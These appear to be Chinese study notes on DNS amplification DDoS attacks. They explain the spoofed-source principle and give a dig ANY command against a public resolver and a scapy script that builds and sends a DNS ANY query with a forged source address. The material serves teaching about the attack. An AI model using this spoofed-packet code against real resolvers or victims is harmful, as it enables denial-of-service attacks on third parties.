DNS放大攻击
- 基于UDP
- 产生大流量的攻击方法
- 单机的带宽优势
- 巨大单机数量形成的流量汇聚
-
DNS放大效果
查询请求流量小
dig any hp.com @202.106.0.20 (流量放大越8倍)
攻击原理
伪造源地址为被攻击目标地址,向大量递归域名查询服务器发起查询
- DNS服务器成为流量放大和实施攻击者,大量DNS服务器实现DDOS
scapy构造攻击数据包
```python
i=IP() #构造 IP 数据包 i.display() i.dst=”202.106.0.20” i.display() u=UDP() #构造 UDP 数据包 u.display() d=DNS() #构造 DNS 数据包 d.display() d.rd=1 d.qdcount=1 d.display() q=DNSQR() #设置查询目标 q.display() q.qname=’qq.com’ q.qtype=255 #(代表any) d.qd=q # 设置目标 d.display() r=(i/u/d) #拼接数据包 r r.display() sr1(r) i.src=”192.168.1.110” r=(i/u/d) r.display() send(r) #发送数据包
发送30字节,回210字节
```